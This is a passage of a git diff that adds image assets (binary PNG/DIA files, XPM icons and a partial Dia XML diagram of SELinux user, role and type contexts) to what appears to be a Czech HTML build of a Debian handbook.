+",,,,,!!,,,,,',,,,,,,%.%,,,,,",
+",,,,,!',,,,*',,,,,-,$)=,,,,,",
+",,,,,!#,,,,*!,,,,&-,#!-,,,,,",
+",,,,,!#,,,,,+-,-*-,=)%,,,,,,",
+",,,,,@!,,,,*#!-,,,&+$,,,,,,,",
+",,,,,#;,,,,,&'+'#!>%,,,,,,,,",
+",,,,,&.',,,,,-$##*,,,,,,,,,,",
+",,,,,,>.*,,,,,,,,,,,,,,,,,,,",
+",,,,,,%.#,,,,,,,,,,,,,,,,,,,",
+",,,,,,,@;-,,,,,,,,,,,,,,,,,,",
+",,,,,,,-+!,,,,,,,,,,,,,,,,,,",
+",,,,,,,,-+!-,,,,,,,,,,,,,,,,",
+",,,,,,,,,-'!%,,,,,,,,,,,,,,,",
+",,,,,,,,,,,&'$%,,,,,,,,,,,,,",
+",,,,,,,,,,,,,,,,,,,,,,,,,,,,"};
diff --git a/tmp/cs-CZ/html/images/developers-map.png b/tmp/cs-CZ/html/images/developers-map.png
new file mode 100644
index 000000000..7185c7bd2
Binary files /dev/null and b/tmp/cs-CZ/html/images/developers-map.png differ
diff --git a/tmp/cs-CZ/html/images/evolution.png b/tmp/cs-CZ/html/images/evolution.png
new file mode 100644
index 000000000..4ae92f887
Binary files /dev/null and b/tmp/cs-CZ/html/images/evolution.png differ
diff --git a/tmp/cs-CZ/html/images/existing-setup-1.dia b/tmp/cs-CZ/html/images/existing-setup-1.dia
new file mode 100644
index 000000000..7854e568d
Binary files /dev/null and b/tmp/cs-CZ/html/images/existing-setup-1.dia differ
diff --git a/tmp/cs-CZ/html/images/existing-setup-1.png b/tmp/cs-CZ/html/images/existing-setup-1.png
new file mode 100644
index 000000000..838c92521
Binary files /dev/null and b/tmp/cs-CZ/html/images/existing-setup-1.png differ
diff --git a/tmp/cs-CZ/html/images/existing-setup-2.dia b/tmp/cs-CZ/html/images/existing-setup-2.dia
new file mode 100644
index 000000000..4198a9ab7
Binary files /dev/null and b/tmp/cs-CZ/html/images/existing-setup-2.dia differ
diff --git a/tmp/cs-CZ/html/images/existing-setup-2.png b/tmp/cs-CZ/html/images/existing-setup-2.png
new file mode 100644
index 000000000..8b44b206b
Binary files /dev/null and b/tmp/cs-CZ/html/images/existing-setup-2.png differ
diff --git a/tmp/cs-CZ/html/images/existing-setup-4.dia b/tmp/cs-CZ/html/images/existing-setup-4.dia
new file mode 100644
index 000000000..1ff98b687
Binary files /dev/null and b/tmp/cs-CZ/html/images/existing-setup-4.dia differ
diff --git a/tmp/cs-CZ/html/images/existing-setup-4.png b/tmp/cs-CZ/html/images/existing-setup-4.png
new file mode 100644
index 000000000..ae984be20
Binary files /dev/null and b/tmp/cs-CZ/html/images/existing-setup-4.png differ
diff --git a/tmp/cs-CZ/html/images/firefox.png b/tmp/cs-CZ/html/images/firefox.png
new file mode 100644
index 000000000..ef2cd5448
Binary files /dev/null and b/tmp/cs-CZ/html/images/firefox.png differ
diff --git a/tmp/cs-CZ/html/images/fwbuilder.png b/tmp/cs-CZ/html/images/fwbuilder.png
new file mode 100644
index 000000000..78207f1e6
Binary files /dev/null and b/tmp/cs-CZ/html/images/fwbuilder.png differ
diff --git a/tmp/cs-CZ/html/images/gnome-mime-application-x-deb.png b/tmp/cs-CZ/html/images/gnome-mime-application-x-deb.png
new file mode 100644
index 000000000..14b96768d
Binary files /dev/null and b/tmp/cs-CZ/html/images/gnome-mime-application-x-deb.png differ
diff --git a/tmp/cs-CZ/html/images/gnome-packagekit.png b/tmp/cs-CZ/html/images/gnome-packagekit.png
new file mode 100644
index 000000000..2ec096591
Binary files /dev/null and b/tmp/cs-CZ/html/images/gnome-packagekit.png differ
diff --git a/tmp/cs-CZ/html/images/gnome.png b/tmp/cs-CZ/html/images/gnome.png
new file mode 100644
index 000000000..e3e7b5d28
Binary files /dev/null and b/tmp/cs-CZ/html/images/gnome.png differ
diff --git a/tmp/cs-CZ/html/images/inst-autopartman-mode.png b/tmp/cs-CZ/html/images/inst-autopartman-mode.png
new file mode 100644
index 000000000..8788e2c87
Binary files /dev/null and b/tmp/cs-CZ/html/images/inst-autopartman-mode.png differ
diff --git a/tmp/cs-CZ/html/images/inst-basesystem.png b/tmp/cs-CZ/html/images/inst-basesystem.png
new file mode 100644
index 000000000..014d710e2
Binary files /dev/null and b/tmp/cs-CZ/html/images/inst-basesystem.png differ
diff --git a/tmp/cs-CZ/html/images/inst-boot.png b/tmp/cs-CZ/html/images/inst-boot.png
new file mode 100644
index 000000000..3b922b4b7
Binary files /dev/null and b/tmp/cs-CZ/html/images/inst-boot.png differ
diff --git a/tmp/cs-CZ/html/images/inst-country-txt.png b/tmp/cs-CZ/html/images/inst-country-txt.png
new file mode 100644
index 000000000..8cb6ad679
Binary files /dev/null and b/tmp/cs-CZ/html/images/inst-country-txt.png differ
diff --git a/tmp/cs-CZ/html/images/inst-country.png b/tmp/cs-CZ/html/images/inst-country.png
new file mode 100644
index 000000000..6bb0bdc4f
Binary files /dev/null and b/tmp/cs-CZ/html/images/inst-country.png differ
diff --git a/tmp/cs-CZ/html/images/inst-gdm.png b/tmp/cs-CZ/html/images/inst-gdm.png
new file mode 100644
index 000000000..98b7e2cf8
Binary files /dev/null and b/tmp/cs-CZ/html/images/inst-gdm.png differ
diff --git a/tmp/cs-CZ/html/images/inst-keyboard-txt.png b/tmp/cs-CZ/html/images/inst-keyboard-txt.png
new file mode 100644
index 000000000..0ac1950aa
Binary files /dev/null and b/tmp/cs-CZ/html/images/inst-keyboard-txt.png differ
diff --git a/tmp/cs-CZ/html/images/inst-keyboard.png b/tmp/cs-CZ/html/images/inst-keyboard.png
new file mode 100644
index 000000000..1f922e3d9
Binary files /dev/null and b/tmp/cs-CZ/html/images/inst-keyboard.png differ
diff --git a/tmp/cs-CZ/html/images/inst-lang-txt.png b/tmp/cs-CZ/html/images/inst-lang-txt.png
new file mode 100644
index 000000000..12d0b4694
Binary files /dev/null and b/tmp/cs-CZ/html/images/inst-lang-txt.png differ
diff --git a/tmp/cs-CZ/html/images/inst-lang.png b/tmp/cs-CZ/html/images/inst-lang.png
new file mode 100644
index 000000000..8c67ffd00
Binary files /dev/null and b/tmp/cs-CZ/html/images/inst-lang.png differ
diff --git a/tmp/cs-CZ/html/images/inst-mirror.png b/tmp/cs-CZ/html/images/inst-mirror.png
new file mode 100644
index 000000000..d39450079
Binary files /dev/null and b/tmp/cs-CZ/html/images/inst-mirror.png differ
diff --git a/tmp/cs-CZ/html/images/inst-partman-disk.png b/tmp/cs-CZ/html/images/inst-partman-disk.png
new file mode 100644
index 000000000..2faa8d909
Binary files /dev/null and b/tmp/cs-CZ/html/images/inst-partman-disk.png differ
diff --git a/tmp/cs-CZ/html/images/inst-partman-validation.png b/tmp/cs-CZ/html/images/inst-partman-validation.png
new file mode 100644
index 000000000..e920eb871
Binary files /dev/null and b/tmp/cs-CZ/html/images/inst-partman-validation.png differ
diff --git a/tmp/cs-CZ/html/images/inst-partman.png b/tmp/cs-CZ/html/images/inst-partman.png
new file mode 100644
index 000000000..94bb1096c
Binary files /dev/null and b/tmp/cs-CZ/html/images/inst-partman.png differ
diff --git a/tmp/cs-CZ/html/images/inst-rootpw.png b/tmp/cs-CZ/html/images/inst-rootpw.png
new file mode 100644
index 000000000..06c86d8f1
Binary files /dev/null and b/tmp/cs-CZ/html/images/inst-rootpw.png differ
diff --git a/tmp/cs-CZ/html/images/inst-tasksel.png b/tmp/cs-CZ/html/images/inst-tasksel.png
new file mode 100644
index 000000000..9bbb0f763
Binary files /dev/null and b/tmp/cs-CZ/html/images/inst-tasksel.png differ
diff --git a/tmp/cs-CZ/html/images/inst-username.png b/tmp/cs-CZ/html/images/inst-username.png
new file mode 100644
index 000000000..a350d2758
Binary files /dev/null and b/tmp/cs-CZ/html/images/inst-username.png differ
diff --git a/tmp/cs-CZ/html/images/kde.png b/tmp/cs-CZ/html/images/kde.png
new file mode 100644
index 000000000..ccf0c6a49
Binary files /dev/null and b/tmp/cs-CZ/html/images/kde.png differ
diff --git a/tmp/cs-CZ/html/images/kmail.png b/tmp/cs-CZ/html/images/kmail.png
new file mode 100644
index 000000000..27c816f0c
Binary files /dev/null and b/tmp/cs-CZ/html/images/kmail.png differ
diff --git a/tmp/cs-CZ/html/images/mail-server.dia b/tmp/cs-CZ/html/images/mail-server.dia
new file mode 100644
index 000000000..166141696
Binary files /dev/null and b/tmp/cs-CZ/html/images/mail-server.dia differ
diff --git a/tmp/cs-CZ/html/images/mail-server.png b/tmp/cs-CZ/html/images/mail-server.png
new file mode 100644
index 000000000..d97ec10d8
Binary files /dev/null and b/tmp/cs-CZ/html/images/mail-server.png differ
diff --git a/tmp/cs-CZ/html/images/microsoft-windows-logo-2.gif b/tmp/cs-CZ/html/images/microsoft-windows-logo-2.gif
new file mode 100644
index 000000000..c0ccf4272
Binary files /dev/null and b/tmp/cs-CZ/html/images/microsoft-windows-logo-2.gif differ
diff --git a/tmp/cs-CZ/html/images/netfilter.dia b/tmp/cs-CZ/html/images/netfilter.dia
new file mode 100644
index 000000000..8bd74c414
Binary files /dev/null and b/tmp/cs-CZ/html/images/netfilter.dia differ
diff --git a/tmp/cs-CZ/html/images/netfilter.png b/tmp/cs-CZ/html/images/netfilter.png
new file mode 100644
index 000000000..e69ca9b05
Binary files /dev/null and b/tmp/cs-CZ/html/images/netfilter.png differ
diff --git a/tmp/cs-CZ/html/images/next.xpm b/tmp/cs-CZ/html/images/next.xpm
new file mode 100644
index 000000000..138389be5
--- /dev/null
+++ b/tmp/cs-CZ/html/images/next.xpm
@@ -0,0 +1,36 @@
+/* XPM */
+static char * next_xpm[] = {
+"28 24 9 1",
+" 	c #c3c3c3",
+".	c #828282",
+"X	c #000000",
+"o	c #ffff9e",
+"O	c #ffbe5d",
+"+	c #ffbe7d",
+"@	c #ff0000",
+"#	c #00ff00",
+"$	c #3c9e3c",
+"                .XXX        ",
+"             .XXXXXX.       ",
+"          .XXXXXoooXX       ",
+"       .XXXOXXXoXXoXX.      ",
+"    .XXXXXXXOXXoooXXXX      ",
+"    .X+OOXXXOXXoXXXoXX.     ",
+"    X.X+X+OOXOXXoooXXXX     ",
+"    X.XXOXXXOOOXXXXX@@@.    ",
+"    XX.X+XXXXX+XX@@@XXXX    ",
+"   .XX.XX+XXXXX#@XXX@XXX.   ",
+"   XXXX.X$#XXX#$XXXX@XXXX   ",
+"   XXXX.XX$#$$#XXXXXX@XXX.  ",
+"   XXXXX.XXXX#$#XXXXX@XXX.  ",
+"   XXXXX.XXXX#$X$#$XXXX.    ",
+"   .XXXXX.XX#$XXXXXX. .XX.  ",
+"    XXXXX.XX#XXXX. .XXXXX   ",
+"    .XXXXX.XXX. .XXXXXXXX   ",
+"     XXXXX.X..XXXXXXXXXXX   ",
+"     .XXXXX.XXXXXXXXXXXX.   ",
+"      XXXXX XXXXXXXXXXXX    ",
+"      .XXXX.XXXXXXXXXXXX    ",
+"       XXX.XXXXXXXXXX.      ",
+"       .XX XXXXXXX.         ",
+"        XX XXXX.            "};
diff --git a/tmp/cs-CZ/html/images/openlogo-nd.png b/tmp/cs-CZ/html/images/openlogo-nd.png
new file mode 100644
index 000000000..989f050a7
Binary files /dev/null and b/tmp/cs-CZ/html/images/openlogo-nd.png differ
diff --git a/tmp/cs-CZ/html/images/package-lifecycle.dia b/tmp/cs-CZ/html/images/package-lifecycle.dia
new file mode 100644
index 000000000..6352dffa6
Binary files /dev/null and b/tmp/cs-CZ/html/images/package-lifecycle.dia differ
diff --git a/tmp/cs-CZ/html/images/package-lifecycle.png b/tmp/cs-CZ/html/images/package-lifecycle.png
new file mode 100644
index 000000000..c72229fe6
Binary files /dev/null and b/tmp/cs-CZ/html/images/package-lifecycle.png differ
diff --git a/tmp/cs-CZ/html/images/package.png b/tmp/cs-CZ/html/images/package.png
new file mode 100644
index 000000000..184e920c1
Binary files /dev/null and b/tmp/cs-CZ/html/images/package.png differ
diff --git a/tmp/cs-CZ/html/images/redhat.xpm b/tmp/cs-CZ/html/images/redhat.xpm
new file mode 100644
index 000000000..8a37a83da
--- /dev/null
+++ b/tmp/cs-CZ/html/images/redhat.xpm
@@ -0,0 +1,29 @@
+/* XPM */
+static char *redhat_xpm[] = {
+"28 24 2 1",
+" 	c #ff9ebe",
+".	c #ff0000",
+"                            ",
+"                            ",
+"       ...        ...       ",
+"       ..............       ",
+"       ..............       ",
+"       ..............       ",
+"       ..............       ",
+"       ..............       ",
+"       ..............       ",
+"       ..............       ",
+"       ..............       ",
+"       ..............       ",
+"       ..............       ",
+"       ..............       ",
+"       ..............       ",
+"       ..............       ",
+"       ..............       ",
+" ..    ..............    .. ",
+" ...   ..............   ... ",
+"  ........................  ",
+"   ......................   ",
+"     ..................     ",
+"        ............        ",
+"                            "};
diff --git a/tmp/cs-CZ/html/images/release-cycle.dia b/tmp/cs-CZ/html/images/release-cycle.dia
new file mode 100644
index 000000000..6d5a73936
Binary files /dev/null and b/tmp/cs-CZ/html/images/release-cycle.dia differ
diff --git a/tmp/cs-CZ/html/images/release-cycle.png b/tmp/cs-CZ/html/images/release-cycle.png
new file mode 100644
index 000000000..7cf307a5e
Binary files /dev/null and b/tmp/cs-CZ/html/images/release-cycle.png differ
diff --git a/tmp/cs-CZ/html/images/selinux-context.dia b/tmp/cs-CZ/html/images/selinux-context.dia
new file mode 100644
index 000000000..a93ef532a
--- /dev/null
+++ b/tmp/cs-CZ/html/images/selinux-context.dia
@@ -0,0 +1,1006 @@
+<?xml version="1.0" encoding="UTF-8"?>
+<dia:diagram xmlns:dia="http://www.lysator.liu.se/~alla/dia/">
+  <dia:diagramdata>
+    <dia:attribute name="background">
+      <dia:color val="#ffffff"/>
+    </dia:attribute>
+    <dia:attribute name="pagebreak">
+      <dia:color val="#000099"/>
+    </dia:attribute>
+    <dia:attribute name="paper">
+      <dia:composite type="paper">
+        <dia:attribute name="name">
+          <dia:string>#A4#</dia:string>
+        </dia:attribute>
+        <dia:attribute name="tmargin">
+          <dia:real val="2.8222000598907471"/>
+        </dia:attribute>
+        <dia:attribute name="bmargin">
+          <dia:real val="2.8222000598907471"/>
+        </dia:attribute>
+        <dia:attribute name="lmargin">
+          <dia:real val="2.8222000598907471"/>
+        </dia:attribute>
+        <dia:attribute name="rmargin">
+          <dia:real val="2.8222000598907471"/>
+        </dia:attribute>
+        <dia:attribute name="is_portrait">
+          <dia:boolean val="true"/>
+        </dia:attribute>
+        <dia:attribute name="scaling">
+          <dia:real val="1"/>
+        </dia:attribute>
+        <dia:attribute name="fitto">
+          <dia:boolean val="false"/>
+        </dia:attribute>
+      </dia:composite>
+    </dia:attribute>
+    <dia:attribute name="grid">
+      <dia:composite type="grid">
+        <dia:attribute name="width_x">
+          <dia:real val="1"/>
+        </dia:attribute>
+        <dia:attribute name="width_y">
+          <dia:real val="1"/>
+        </dia:attribute>
+        <dia:attribute name="visible_x">
+          <dia:int val="1"/>
+        </dia:attribute>
+        <dia:attribute name="visible_y">
+          <dia:int val="1"/>
+        </dia:attribute>
+        <dia:composite type="color"/>
+      </dia:composite>
+    </dia:attribute>
+    <dia:attribute name="color">
+      <dia:color val="#d8e5e5"/>
+    </dia:attribute>
+    <dia:attribute name="guides">
+      <dia:composite type="guides">
+        <dia:attribute name="hguides"/>
+        <dia:attribute name="vguides"/>
+      </dia:composite>
+    </dia:attribute>
+  </dia:diagramdata>
+  <dia:layer name="Arrière-plan" visible="true" active="true">
+    <dia:object type="Flowchart - Box" version="0" id="O0">
+      <dia:attribute name="obj_pos">
+        <dia:point val="5.3,3.065"/>
+      </dia:attribute>
+      <dia:attribute name="obj_bb">
+        <dia:rectangle val="5.25,3.015;7.75,5.015"/>
+      </dia:attribute>
+      <dia:attribute name="elem_corner">
+        <dia:point val="5.3,3.065"/>
+      </dia:attribute>
+      <dia:attribute name="elem_width">
+        <dia:real val="2.3999999999999999"/>
+      </dia:attribute>
+      <dia:attribute name="elem_height">
+        <dia:real val="1.9000000000000001"/>
+      </dia:attribute>
+      <dia:attribute name="show_background">
+        <dia:boolean val="true"/>
+      </dia:attribute>
+      <dia:attribute name="padding">
+        <dia:real val="0.5"/>
+      </dia:attribute>
+      <dia:attribute name="text">
+        <dia:composite type="text">
+          <dia:attribute name="string">
+            <dia:string>#root#</dia:string>
+          </dia:attribute>
+          <dia:attribute name="font">
+            <dia:font family="sans" style="0" name="Helvetica"/>
+          </dia:attribute>
+          <dia:attribute name="height">
+            <dia:real val="0.80000000000000004"/>
+          </dia:attribute>
+          <dia:attribute name="pos">
+            <dia:point val="6.5,4.21"/>
+          </dia:attribute>
+          <dia:attribute name="color">
+            <dia:color val="#000000"/>
+          </dia:attribute>
+          <dia:attribute name="alignment">
+            <dia:enum val="1"/>
+          </dia:attribute>
+        </dia:composite>
+      </dia:attribute>
+    </dia:object>
+    <dia:object type="Flowchart - Box" version="0" id="O1">
+      <dia:attribute name="obj_pos">
+        <dia:point val="9.9,3.065"/>
+      </dia:attribute>
+      <dia:attribute name="obj_bb">
+        <dia:rectangle val="9.85,3.015;13.65,5.015"/>
+      </dia:attribute>
+      <dia:attribute name="elem_corner">
+        <dia:point val="9.9,3.065"/>
+      </dia:attribute>
+      <dia:attribute name="elem_width">
+        <dia:real val="3.7000000000000002"/>
+      </dia:attribute>
+      <dia:attribute name="elem_height">
+        <dia:real val="1.9000000000000001"/>
+      </dia:attribute>
+      <dia:attribute name="show_background">
+        <dia:boolean val="true"/>
+      </dia:attribute>
+      <dia:attribute name="padding">
+        <dia:real val="0.5"/>
+      </dia:attribute>
+      <dia:attribute name="text">
+        <dia:composite type="text">
+          <dia:attribute name="string">
+            <dia:string>#hertzog#</dia:string>
+          </dia:attribute>
+          <dia:attribute name="font">
+            <dia:font family="sans" style="0" name="Helvetica"/>
+          </dia:attribute>
+          <dia:attribute name="height">
+            <dia:real val="0.80000000000000004"/>
+          </dia:attribute>
+          <dia:attribute name="pos">
+            <dia:point val="11.75,4.21"/>
+          </dia:attribute>
+          <dia:attribute name="color">
+            <dia:color val="#000000"/>
+          </dia:attribute>
+          <dia:attribute name="alignment">
+            <dia:enum val="1"/>
+          </dia:attribute>
+        </dia:composite>
+      </dia:attribute>
+    </dia:object>
+    <dia:object type="Flowchart - Box" version="0" id="O2">
+      <dia:attribute name="obj_pos">
+        <dia:point val="12.115,7.335"/>
+      </dia:attribute>
+      <dia:attribute name="obj_bb">
+        <dia:rectangle val="12.065,7.285;15.385,9.285"/>
+      </dia:attribute>
+      <dia:attribute name="elem_corner">
+        <dia:point val="12.115,7.335"/>
+      </dia:attribute>
+      <dia:attribute name="elem_width">
+        <dia:real val="3.2200000000000002"/>
+      </dia:attribute>
+      <dia:attribute name="elem_height">
+        <dia:real val="1.9000000000000001"/>
+      </dia:attribute>
+      <dia:attribute name="show_background">
+        <dia:boolean val="true"/>
+      </dia:attribute>
+      <dia:attribute name="padding">
+        <dia:real val="0.5"/>
+      </dia:attribute>
+      <dia:attribute name="text">
+        <dia:composite type="text">
+          <dia:attribute name="string">
+            <dia:string>#user_u#</dia:string>
+          </dia:attribute>
+          <dia:attribute name="font">
+            <dia:font family="sans" style="0" name="Helvetica"/>
+          </dia:attribute>
+          <dia:attribute name="height">
+            <dia:real val="0.80000000000000004"/>
+          </dia:attribute>
+          <dia:attribute name="pos">
+            <dia:point val="13.725,8.48"/>
+          </dia:attribute>
+          <dia:attribute name="color">
+            <dia:color val="#000000"/>
+          </dia:attribute>
+          <dia:attribute name="alignment">
+            <dia:enum val="1"/>
+          </dia:attribute>
+        </dia:composite>
+      </dia:attribute>
+    </dia:object>
+    <dia:object type="Flowchart - Box" version="0" id="O3">
+      <dia:attribute name="obj_pos">
+        <dia:point val="5.3,7.335"/>
+      </dia:attribute>
+      <dia:attribute name="obj_bb">
+        <dia:rectangle val="5.25,7.285;7.75,9.285"/>
+      </dia:attribute>
+      <dia:attribute name="elem_corner">
+        <dia:point val="5.3,7.335"/>
+      </dia:attribute>
+      <dia:attribute name="elem_width">
+        <dia:real val="2.3999999999999999"/>
+      </dia:attribute>
+      <dia:attribute name="elem_height">
+        <dia:real val="1.9000000000000004"/>
+      </dia:attribute>
+      <dia:attribute name="show_background">
+        <dia:boolean val="true"/>
+      </dia:attribute>
+      <dia:attribute name="padding">
+        <dia:real val="0.5"/>
+      </dia:attribute>
+      <dia:attribute name="text">
+        <dia:composite type="text">
+          <dia:attribute name="string">
+            <dia:string>#root#</dia:string>
+          </dia:attribute>
+          <dia:attribute name="font">
+            <dia:font family="sans" style="0" name="Helvetica"/>
+          </dia:attribute>
+          <dia:attribute name="height">
+            <dia:real val="0.80000000000000004"/>
+          </dia:attribute>
+          <dia:attribute name="pos">
+            <dia:point val="6.5,8.48"/>
+          </dia:attribute>
+          <dia:attribute name="color">
+            <dia:color val="#000000"/>
+          </dia:attribute>
+          <dia:attribute name="alignment">
+            <dia:enum val="1"/>
+          </dia:attribute>
+        </dia:composite>
+      </dia:attribute>
+    </dia:object>
+    <dia:object type="Flowchart - Box" version="0" id="O4">
+      <dia:attribute name="obj_pos">
+        <dia:point val="12.1862,11.605"/>
+      </dia:attribute>
+      <dia:attribute name="obj_bb">
+        <dia:rectangle val="12.1362,11.555;15.3138,13.555"/>
+      </dia:attribute>
+      <dia:attribute name="elem_corner">
+        <dia:point val="12.1862,11.605"/>
+      </dia:attribute>
+      <dia:attribute name="elem_width">
+        <dia:real val="3.0775000000000001"/>
+      </dia:attribute>
+      <dia:attribute name="elem_height">
+        <dia:real val="1.9000000000000004"/>
+      </dia:attribute>
+      <dia:attribute name="show_background">
+        <dia:boolean val="true"/>
+      </dia:attribute>
+      <dia:attribute name="padding">
+        <dia:real val="0.5"/>
+      </dia:attribute>
+      <dia:attribute name="text">
+        <dia:composite type="text">
+          <dia:attribute name="string">
+            <dia:string>#user_r#</dia:string>
+          </dia:attribute>
+          <dia:attribute name="font">
+            <dia:font family="sans" style="0" name="Helvetica"/>
+          </dia:attribute>
+          <dia:attribute name="height">
+            <dia:real val="0.80000000000000004"/>
+          </dia:attribute>
+          <dia:attribute name="pos">
+            <dia:point val="13.725,12.75"/>
+          </dia:attribute>
+          <dia:attribute name="color">
+            <dia:color val="#000000"/>
+          </dia:attribute>
+          <dia:attribute name="alignment">
+            <dia:enum val="1"/>
+          </dia:attribute>
+        </dia:composite>
+      </dia:attribute>
+    </dia:object>
+    <dia:object type="Flowchart - Box" version="0" id="O5">
+      <dia:attribute name="obj_pos">
+        <dia:point val="4.425,11.605"/>
+      </dia:attribute>
+      <dia:attribute name="obj_bb">
+        <dia:rectangle val="4.375,11.555;8.625,13.555"/>
+      </dia:attribute>
+      <dia:attribute name="elem_corner">
+        <dia:point val="4.425,11.605"/>
+      </dia:attribute>
+      <dia:attribute name="elem_width">
+        <dia:real val="4.1499999999999995"/>
+      </dia:attribute>
+      <dia:attribute name="elem_height">
+        <dia:real val="1.9000000000000004"/>
+      </dia:attribute>
+      <dia:attribute name="show_background">
+        <dia:boolean val="true"/>
+      </dia:attribute>
+      <dia:attribute name="padding">
+        <dia:real val="0.5"/>
+      </dia:attribute>
+      <dia:attribute name="text">
+        <dia:composite type="text">
+          <dia:attribute name="string">
+            <dia:string>#sysadm_r#</dia:string>
+          </dia:attribute>
+          <dia:attribute name="font">
+            <dia:font family="sans" style="0" name="Helvetica"/>
+          </dia:attribute>
+          <dia:attribute name="height">
+            <dia:real val="0.80000000000000004"/>
+          </dia:attribute>
+          <dia:attribute name="pos">
+            <dia:point val="6.5,12.75"/>
+          </dia:attribute>
+          <dia:attribute name="color">
+            <dia:color val="#000000"/>
+          </dia:attribute>
+          <dia:attribute name="alignment">
+            <dia:enum val="1"/>
+          </dia:attribute>
+        </dia:composite>
+      </dia:attribute>
+    </dia:object>
+    <dia:object type="Flowchart - Box" version="0" id="O6">
+      <dia:attribute name="obj_pos">
+        <dia:point val="4.43125,15.875"/>
+      </dia:attribute>
+      <dia:attribute name="obj_bb">
+        <dia:rectangle val="4.38125,15.825;8.61875,17.825"/>
+      </dia:attribute>
+      <dia:attribute name="elem_corner">
+        <dia:point val="4.43125,15.875"/>
+      </dia:attribute>
+      <dia:attribute name="elem_width">
+        <dia:real val="4.1375000000000002"/>
+      </dia:attribute>
+      <dia:attribute name="elem_height">
+        <dia:real val="1.9000000000000001"/>
+      </dia:attribute>
+      <dia:attribute name="show_background">
+        <dia:boolean val="true"/>
+      </dia:attribute>
+      <dia:attribute name="padding">
+        <dia:real val="0.5"/>
+      </dia:attribute>
+      <dia:attribute name="text">
+        <dia:composite type="text">
+          <dia:attribute name="string">
+            <dia:string>#sysadm_t#</dia:string>
+          </dia:attribute>
+          <dia:attribute name="font">
+            <dia:font family="sans" style="0" name="Helvetica"/>
+          </dia:attribute>
+          <dia:attribute name="height">
+            <dia:real val="0.80000000000000004"/>
+          </dia:attribute>
+          <dia:attribute name="pos">
+            <dia:point val="6.5,17.02"/>
+          </dia:attribute>
+          <dia:attribute name="color">
+            <dia:color val="#000000"/>
+          </dia:attribute>
+          <dia:attribute name="alignment">
+            <dia:enum val="1"/>
+          </dia:attribute>
+        </dia:composite>
+      </dia:attribute>
+    </dia:object>
+    <dia:object type="Flowchart - Box" version="0" id="O7">
+      <dia:attribute name="obj_pos">
+        <dia:point val="12.1925,15.875"/>
+      </dia:attribute>
+      <dia:attribute name="obj_bb">
+        <dia:rectangle val="12.1425,15.825;15.3075,17.825"/>
+      </dia:attribute>
+      <dia:attribute name="elem_corner">
+        <dia:point val="12.1925,15.875"/>
+      </dia:attribute>
+      <dia:attribute name="elem_width">
+        <dia:real val="3.0649999999999999"/>
+      </dia:attribute>
+      <dia:attribute name="elem_height">
+        <dia:real val="1.9000000000000001"/>
+      </dia:attribute>
+      <dia:attribute name="show_background">
+        <dia:boolean val="true"/>
+      </dia:attribute>
+      <dia:attribute name="padding">
+        <dia:real val="0.5"/>
+      </dia:attribute>
+      <dia:attribute name="text">
+        <dia:composite type="text">
+          <dia:attribute name="string">
+            <dia:string>#user_t#</dia:string>
+          </dia:attribute>
+          <dia:attribute name="font">
+            <dia:font family="sans" style="0" name="Helvetica"/>
+          </dia:attribute>
+          <dia:attribute name="height">
+            <dia:real val="0.80000000000000004"/>
+          </dia:attribute>
+          <dia:attribute name="pos">
+            <dia:point val="13.725,17.02"/>
+          </dia:attribute>
+          <dia:attribute name="color">
+            <dia:color val="#000000"/>
+          </dia:attribute>
+          <dia:attribute name="alignment">
+            <dia:enum val="1"/>
+          </dia:attribute>
+        </dia:composite>
+      </dia:attribute>
+    </dia:object>
+    <dia:object type="Flowchart - Box" version="0" id="O8">
+      <dia:attribute name="obj_pos">
+        <dia:point val="14.525,3.065"/>
+      </dia:attribute>
+      <dia:attribute name="obj_bb">
+        <dia:rectangle val="14.475,3.015;18.275,5.015"/>
+      </dia:attribute>
+      <dia:attribute name="elem_corner">
+        <dia:point val="14.525,3.065"/>
+      </dia:attribute>
+      <dia:attribute name="elem_width">
+        <dia:real val="3.7000000000000002"/>
+      </dia:attribute>
+      <dia:attribute name="elem_height">
+        <dia:real val="1.9000000000000001"/>
+      </dia:attribute>
+      <dia:attribute name="show_background">
+        <dia:boolean val="true"/>
+      </dia:attribute>
+      <dia:attribute name="padding">
+        <dia:real val="0.5"/>
+      </dia:attribute>
+      <dia:attribute name="text">
+        <dia:composite type="text">
+          <dia:attribute name="string">
+            <dia:string>#lolando#</dia:string>
+          </dia:attribute>
+          <dia:attribute name="font">
+            <dia:font family="sans" style="0" name="Helvetica"/>
+          </dia:attribute>
+          <dia:attribute name="height">
+            <dia:real val="0.80000000000000004"/>
+          </dia:attribute>
+          <dia:attribute name="pos">
+            <dia:point val="16.375,4.21"/>
+          </dia:attribute>
+          <dia:attribute name="color">
+            <dia:color val="#000000"/>
+          </dia:attribute>
+          <dia:attribute name="alignment">
+            <dia:enum val="1"/>
+          </dia:attribute>
+        </dia:composite>
+      </dia:attribute>
+    </dia:object>
+    <dia:object type="Standard - Line" version="0" id="O9">
+      <dia:attribute name="obj_pos">
+        <dia:point val="6.5,5.0144"/>
+      </dia:attribute>
+      <dia:attribute name="obj_bb">
+        <dia:rectangle val="6.1382,4.9644;6.8618,7.4468"/>
+      </dia:attribute>
+      <dia:attribute name="conn_endpoints">
+        <dia:point val="6.5,5.0144"/>
+        <dia:point val="6.5,7.335"/>
+      </dia:attribute>
+      <dia:attribute name="numcp">
+        <dia:int val="1"/>
+      </dia:attribute>
+      <dia:attribute name="end_arrow">
+        <dia:enum val="22"/>
+      </dia:attribute>
+      <dia:attribute name="end_arrow_length">
+        <dia:real val="0.5"/>
+      </dia:attribute>
+      <dia:attribute name="end_arrow_width">
+        <dia:real val="0.5"/>
+      </dia:attribute>
+      <dia:connections>
+        <dia:connection handle="0" to="O0" connection="16"/>
+        <dia:connection handle="1" to="O3" connection="2"/>
+      </dia:connections>
+    </dia:object>
+    <dia:object type="Standard - Line" version="0" id="O10">
+      <dia:attribute name="obj_pos">
+        <dia:point val="11.75,4.965"/>
+      </dia:attribute>
+      <dia:attribute name="obj_bb">
+        <dia:rectangle val="11.683,4.89799;12.9969,7.43517"/>
+      </dia:attribute>
+      <dia:attribute name="conn_endpoints">
+        <dia:point val="11.75,4.965"/>
+        <dia:point val="12.925,7.335"/>
+      </dia:attribute>
+      <dia:attribute name="numcp">
+        <dia:int val="1"/>
+      </dia:attribute>
+      <dia:attribute name="end_arrow">
+        <dia:enum val="22"/>
+      </dia:attribute>
+      <dia:attribute name="end_arrow_length">
+        <dia:real val="0.5"/>
+      </dia:attribute>
+      <dia:attribute name="end_arrow_width">
+        <dia:real val="0.5"/>
+      </dia:attribute>
+      <dia:connections>
+        <dia:connection handle="0" to="O1" connection="13"/>
